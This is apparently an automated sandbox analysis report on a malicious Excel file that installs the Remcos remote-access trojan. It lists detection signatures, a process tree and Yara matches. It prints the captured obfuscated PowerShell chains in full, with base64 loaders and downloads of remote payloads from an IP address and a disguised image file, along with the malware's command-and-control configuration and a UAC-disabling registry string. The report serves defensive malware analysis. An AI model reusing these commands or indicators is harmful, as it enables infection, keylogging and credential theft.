Windows Analysis Report
QPS-36477.xls

Overview

General Information

Sample name: QPS-36477.xls
Analysis ID: 1529026
MD5: 912e8c547d1e8dd1e12afbd819074b30
SHA1: 96fd97dc12ae0a792c85fdf7ec9a2424a90097b3
SHA256: b86e4c334af2fdbe88b3cb50cd85c47eac10a9e9b9ac7c0dd656e37cabce7a5a
Tags: xls, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3480 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3764 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3852 cmdline: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3876 cmdline: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3976 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3988 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 3232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 1908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 1432 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3512 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 1120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt" MD5: 8FE9545E9F72E460723F484C304314AD)
    • mshta.exe (PID: 2988 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3016 cmdline: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 1012 cmdline: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3580 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2196 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3644 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 3784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 4072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |

Source | Rule | Description | Author | Strings
30.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
30.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
30.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
30.2.RegAsm.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
30.2.RegAsm.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]

System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                    Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3480, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newthingtobeonlinefor[1].hta
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = 
{1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSA
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = 
{1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSA
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" 